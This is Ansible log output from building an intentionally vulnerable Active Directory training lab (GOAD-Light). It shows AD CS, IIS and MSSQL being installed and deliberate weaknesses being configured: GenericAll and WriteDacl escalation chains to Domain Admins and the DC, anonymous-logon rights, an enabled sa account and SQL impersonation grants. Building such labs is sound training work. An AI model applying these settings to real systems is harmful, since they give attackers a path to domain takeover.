changed: [dc02] => (item={'key': 'Administrators', 'value': ['north\\eddard.stark', 'north\\catelyn.stark', 'north\\robb.stark']})
changed: [dc01] => (item={'key': 'Administrators', 'value': ['sevenkingdoms\\robert.baratheon', 'sevenkingdoms\\cersei.lannister', 'sevenkingdoms\\DragonRider']})
changed: [srv02] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']})
changed: [dc02] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Stark']})
changed: [dc01] => (item={'key': 'Remote Desktop Users', 'value': ['sevenkingdoms\\Small Council', 'sevenkingdoms\\Baratheon']})
 [started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on dc01]
 [started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on dc02]
 [started TASK: settings/user_rights : Add remote desktop and administrators group to rdp on srv02]

TASK [settings/user_rights : Add remote desktop and administrators group to rdp] ***************************************************************************************************************************
ok: [srv02]
changed: [dc02]
changed: [dc01]

PLAY [cross domain groups] *********************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
 [started TASK: groups_domains : Reboot and wait for the AD system to restart on dc01]
 [started TASK: groups_domains : Reboot and wait for the AD system to restart on dc02]

TASK [groups_domains : Reboot and wait for the AD system to restart] ***************************************************************************************************************************************
changed: [dc01]
changed: [dc02]
 [started TASK: groups_domains : synchronizes all domains on dc01]
 [started TASK: groups_domains : synchronizes all domains on dc02]

TASK [groups_domains : synchronizes all domains] ***********************************************************************************************************************************************************
changed: [dc02]
changed: [dc01]
 [started TASK: groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} on dc01]
 [started TASK: groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} on dc02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=12   changed=4    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=7    changed=4    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : adcs.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini adcs.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [ADCS] ************************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: adcs : Install ADCS on dc01]

TASK [adcs : Install ADCS] *********************************************************************************************************************************************************************************
changed: [dc01]
 [started TASK: adcs : Install-WindowsFeature ADCS-Cert-Authority on dc01]

TASK [adcs : Install-WindowsFeature ADCS-Cert-Authority] ***************************************************************************************************************************************************
ok: [dc01]
 [started TASK: adcs : Install-WindowsFeature ADCS-Web-Enrollment on dc01]

TASK [adcs : Install-WindowsFeature ADCS-Web-Enrollment] ***************************************************************************************************************************************************
ok: [dc01]
 [started TASK: adcs : Install-ADCSCertificationAuthority-PS on dc01]

TASK [adcs : Install-ADCSCertificationAuthority-PS] ********************************************************************************************************************************************************
changed: [dc01]
 [started TASK: adcs : Enable Web enrollement on dc01]

TASK [adcs : Enable Web enrollement] ***********************************************************************************************************************************************************************
changed: [dc01]
 [started TASK: adcs : Refresh on dc01]

TASK [adcs : Refresh] **************************************************************************************************************************************************************************************
changed: [dc01]

PLAY [ADCS] ************************************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=13   changed=4    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-acl.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini ad-acl.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [ACL inside AD] ***************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: acl : set acl on dc01]
 [started TASK: acl : set acl on dc02]

TASK [acl : set acl] ***************************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'forcechangepassword_tywin_jaime', 'value': {'for': 'tywin.lannister', 'to': 'jaime.lannister', 'right': 'Ext-User-Force-Change-Password', 'inheritance': 'None'}})
changed: [dc02] => (item={'key': 'anonymous_rpc', 'value': {'for': 'NT AUTHORITY\\ANONYMOUS LOGON', 'to': 'DC=North,DC=sevenkingdoms,DC=local', 'right': 'ReadProperty', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'GenericWrite_on_user_jaimie_joffrey', 'value': {'for': 'jaime.lannister', 'to': 'joffrey.baratheon', 'right': 'GenericWrite', 'inheritance': 'None'}})
changed: [dc02] => (item={'key': 'anonymous_rpc2', 'value': {'for': 'NT AUTHORITY\\ANONYMOUS LOGON', 'to': 'DC=North,DC=sevenkingdoms,DC=local', 'right': 'GenericExecute', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'Writedacl_joffrey_tyron', 'value': {'for': 'joffrey.baratheon', 'to': 'tyron.lannister', 'right': 'WriteDacl', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'self-self-membership-on-group_tyron_small_council', 'value': {'for': 'tyron.lannister', 'to': 'Small Council', 'right': 'Ext-Self-Self-Membership', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'addmember_smallcouncil_DragonStone', 'value': {'for': 'Small Council', 'to': 'DragonStone', 'right': 'Ext-Write-Self-Membership', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'write_owner_dragonstone_kingsguard', 'value': {'for': 'DragonStone', 'to': 'KingsGuard', 'right': 'WriteOwner', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_kingsguard_stanis', 'value': {'for': 'KingsGuard', 'to': 'stannis.baratheon', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_stanis_dc', 'value': {'for': 'stannis.baratheon', 'to': 'kingslanding$', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_group_acrrosdom_dc', 'value': {'for': 'AcrossTheNarrowSea', 'to': 'kingslanding$', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_varys_domadmin', 'value': {'for': 'lord.varys', 'to': 'Domain Admins', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_varys_domadmin_holder', 'value': {'for': 'lord.varys', 'to': 'CN=AdminSDHolder,CN=System,DC=sevenkingdoms,DC=local', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'WriteDACL_renly_Crownlands', 'value': {'for': 'renly.baratheon', 'to': 'OU=Crownlands,DC=sevenkingdoms,DC=local', 'right': 'WriteDacl', 'inheritance': 'None'}})

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=8    changed=1    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=3    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : servers.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [srv02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Install IIS] *****************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Enable update service on srv02]

TASK [iis : Enable update service] *************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Install IIS Management Features on srv02]

TASK [iis : Install IIS Management Features] ***************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components) on srv02]

TASK [iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components)] *******************************************************************************************************
changed: [srv02]
 [started TASK: iis : Install IIS 6 Compatibility Features on srv02]

TASK [iis : Install IIS 6 Compatibility Features] **********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Install IIS Web-Server with sub features and management tools on srv02]

TASK [iis : Install IIS Web-Server with sub features and management tools] *********************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : default-website-index on srv02]

TASK [iis : default-website-index] *************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Reboot if installing Web-Server feature requires it on srv02]

PLAY [Install MSSQL Express] *******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Reboot before install (long timeout in case of update) on srv02]

TASK [mssql : Reboot before install (long timeout in case of update)] **************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Set download_url on srv02]

TASK [mssql : Set download_url] ****************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set connection method on srv02]

TASK [mssql : Set connection method] ***********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_instance on srv02]

TASK [mssql : Set mssql_service_instance] ******************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_name on srv02]

TASK [mssql : Set mssql_service_name] **********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Display mssql variables in use on srv02]

TASK [mssql : Display mssql variables in use] **************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": [
        "MSSQL version        : MSSQL_2019",
        "MSSQL service name   : MSSQL$SQLEXPRESS",
        "MSSQL download url   : https://download.microsoft.com/download/7/f/8/7f8a9c43-8c8a-4f7c-9f92-83c18d96b681/SQL2019-SSEI-Expr.exe",
        "MSSQL instance       : SQLEXPRESS",
        "MSSQL connection use : -E"
    ]
}
 [started TASK: mssql : create a directory for installer download on srv02]

TASK [mssql : create a directory for installer download] ***************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : create a directory for installer extraction on srv02]

TASK [mssql : create a directory for installer extraction] *************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : create a directory for media extraction on srv02]

TASK [mssql : create a directory for media extraction] *****************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : create the configuration file on srv02]

TASK [mssql : create the configuration file] ***************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : check downloaded file exists on srv02]

TASK [mssql : check downloaded file exists] ****************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : get the installer on srv02]

TASK [mssql : get the installer] ***************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Add service account to Log on as a service on srv02]

TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : check MSSQL service already exist (if failed service do not exist, launch install) on srv02]

TASK [mssql : check MSSQL service already exist (if failed service do not exist, launch install)] **********************************************************************************************************
ok: [srv02]
 [started TASK: mssql : debug on srv02]

TASK [mssql : debug] ***************************************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": {
        "changed": false,
        "exists": false,
        "failed": false,
        "failed_when_result": false
    }
}
 [started TASK: mssql : Install the database on srv02]
FAILED - RETRYING: [srv02]: Install the database (3 retries left).
FAILED - RETRYING: [srv02]: Install the database (2 retries left).
FAILED - RETRYING: [srv02]: Install the database (1 retries left).

TASK [mssql : Install the database] ************************************************************************************************************************************************************************
fatal: [srv02]: FAILED! => {"attempts": 3, "changed": true, "cmd": "c:\\setup\\mssql\\sql_installer.exe /configurationfile=c:\\setup\\mssql\\sql_conf.ini /IACCEPTSQLSERVERLICENSETERMS /MEDIAPATH=c:\\setup\\mssql\\media /QUIET /HIDEPROGRESSBAR", "delta": "0:00:35.187290", "end": "2026-02-12 16:17:02.429965", "msg": "non-zero return code", "rc": 2226323458, "start": "2026-02-12 16:16:27.242675", "stderr": "", "stderr_lines": [], "stdout": "Microsoft (R) SQL Server Installer\r\nCopyright (c) 2019 Microsoft.  All rights reserved.\r\n\r\nDownloading install package...\r\n\r\n\r\nOperation finished with result: Failure\r\n\r\nOops...\r\n\r\nUnable to install SQL Server (setup.exe).\r\n\r\n      Exit code (Decimal): -2068643838\r\n      Exit message: No features were installed during the setup execution. The requested features may already be installed. Please review the summary.txt log for further details.\r\n\r\n  SQL SERVER INSTALL LOG FOLDER\r\n      c:\\Program Files\\Microsoft SQL Server\\150\\Setup Bootstrap\\Log\\20260212_081633\r\n\r\n", "stdout_lines": ["Microsoft (R) SQL Server Installer", "Copyright (c) 2019 Microsoft.  All rights reserved.", "", "Downloading install package...", "", "", "Operation finished with result: Failure", "", "Oops...", "", "Unable to install SQL Server (setup.exe).", "", "      Exit code (Decimal): -2068643838", "      Exit message: No features were installed during the setup execution. The requested features may already be installed. Please review the summary.txt log for further details.", "", "  SQL SERVER INSTALL LOG FOLDER", "      c:\\Program Files\\Microsoft SQL Server\\150\\Setup Bootstrap\\Log\\20260212_081633", ""]}

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=26   changed=13   unreachable=0    failed=1    skipped=1    rescued=0    ignored=0   

[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Install IIS] *****************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Enable update service on srv02]

TASK [iis : Enable update service] *************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Install IIS Management Features on srv02]

TASK [iis : Install IIS Management Features] ***************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components) on srv02]

TASK [iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components)] *******************************************************************************************************
ok: [srv02]
 [started TASK: iis : Install IIS 6 Compatibility Features on srv02]

TASK [iis : Install IIS 6 Compatibility Features] **********************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Install IIS Web-Server with sub features and management tools on srv02]

TASK [iis : Install IIS Web-Server with sub features and management tools] *********************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : default-website-index on srv02]

TASK [iis : default-website-index] *************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Reboot if installing Web-Server feature requires it on srv02]

PLAY [Install MSSQL Express] *******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Reboot before install (long timeout in case of update) on srv02]

TASK [mssql : Reboot before install (long timeout in case of update)] **************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Set download_url on srv02]

TASK [mssql : Set download_url] ****************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set connection method on srv02]

TASK [mssql : Set connection method] ***********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_instance on srv02]

TASK [mssql : Set mssql_service_instance] ******************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_name on srv02]

TASK [mssql : Set mssql_service_name] **********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Display mssql variables in use on srv02]

TASK [mssql : Display mssql variables in use] **************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": [
        "MSSQL version        : MSSQL_2019",
        "MSSQL service name   : MSSQL$SQLEXPRESS",
        "MSSQL download url   : https://download.microsoft.com/download/7/f/8/7f8a9c43-8c8a-4f7c-9f92-83c18d96b681/SQL2019-SSEI-Expr.exe",
        "MSSQL instance       : SQLEXPRESS",
        "MSSQL connection use : -E"
    ]
}
 [started TASK: mssql : create a directory for installer download on srv02]

TASK [mssql : create a directory for installer download] ***************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : create a directory for installer extraction on srv02]

TASK [mssql : create a directory for installer extraction] *************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : create a directory for media extraction on srv02]

TASK [mssql : create a directory for media extraction] *****************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : create the configuration file on srv02]

TASK [mssql : create the configuration file] ***************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : check downloaded file exists on srv02]

TASK [mssql : check downloaded file exists] ****************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : get the installer on srv02]
 [started TASK: mssql : Add service account to Log on as a service on srv02]

TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : check MSSQL service already exist (if failed service do not exist, launch install) on srv02]

TASK [mssql : check MSSQL service already exist (if failed service do not exist, launch install)] **********************************************************************************************************
ok: [srv02]
 [started TASK: mssql : debug on srv02]

TASK [mssql : debug] ***************************************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": {
        "can_pause_and_continue": true,
        "changed": false,
        "depended_by": [
            "SQLAgent$SQLEXPRESS"
        ],
        "dependencies": [
            "KEYISO"
        ],
        "description": "Provides storage, processing and controlled access of data, and rapid transaction processing.",
        "desktop_interact": false,
        "display_name": "SQL Server (SQLEXPRESS)",
        "exists": true,
        "failed": false,
        "failed_when_result": false,
        "name": "MSSQL$SQLEXPRESS",
        "path": "\"c:\\Program Files\\Microsoft SQL Server\\MSSQL15.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS",
        "start_mode": "auto",
        "state": "running",
        "username": "north.sevenkingdoms.local\\sql_svc"
    }
}
 [started TASK: mssql : Install the database on srv02]
 [started TASK: mssql : Add or update registry for ip port on srv02]
 [started TASK: mssql : Add or update registry for ip port on srv02]

TASK [mssql : Add or update registry for ip port] **********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Reboot on srv02]

TASK [mssql : Reboot] **************************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Firewall | Allow MSSQL through Firewall on srv02]

TASK [mssql : Firewall | Allow MSSQL through Firewall] *****************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Firewall | Allow MSSQL discover through Firewall on srv02]

TASK [mssql : Firewall | Allow MSSQL discover through Firewall] ********************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Be sure service is started on srv02]

TASK [mssql : Be sure service is started] ******************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Wait for port 1433 to become open on the host, start checking every 5 seconds on srv02]

TASK [mssql : Wait for port 1433 to become open on the host, start checking every 5 seconds] ***************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Add MSSQL admin on srv02]

TASK [mssql : Add MSSQL admin] *****************************************************************************************************************************************************************************
changed: [srv02] => (item=NORTH\jon.snow)
 [started TASK: mssql : Add IMPERSONATE on login on srv02]

TASK [mssql : Add IMPERSONATE on login] ********************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'NORTH\\samwell.tarly', 'value': 'sa'})
changed: [srv02] => (item={'key': 'NORTH\\brandon.stark', 'value': 'NORTH\\jon.snow'})
 [started TASK: mssql : Add IMPERSONATE on user on srv02]

TASK [mssql : Add IMPERSONATE on user] *********************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'arya_master_dbo', 'value': {'user': 'NORTH\\arya.stark', 'db': 'master', 'impersonate': 'dbo'}})
changed: [srv02] => (item={'key': 'arya_dbms_dbo', 'value': {'user': 'NORTH\\arya.stark', 'db': 'msdb', 'impersonate': 'dbo'}})
 [started TASK: mssql : Enable sa account on srv02]

TASK [mssql : Enable sa account] ***************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : enable MSSQL authentication and windows authent on srv02]

TASK [mssql : enable MSSQL authentication and windows authent] *********************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Restart service MSSQL on srv02]

TASK [mssql : Restart service MSSQL] ***********************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql_link : Create SQL Linked server and enable RPC on srv02]
 [started TASK: mssql_link : create logins on srv02]
 [started TASK: mssql_link : default login impersonation on srv02]

PLAY [Install SQL Server Management Studio] ****************************************************************************************************************************************************************
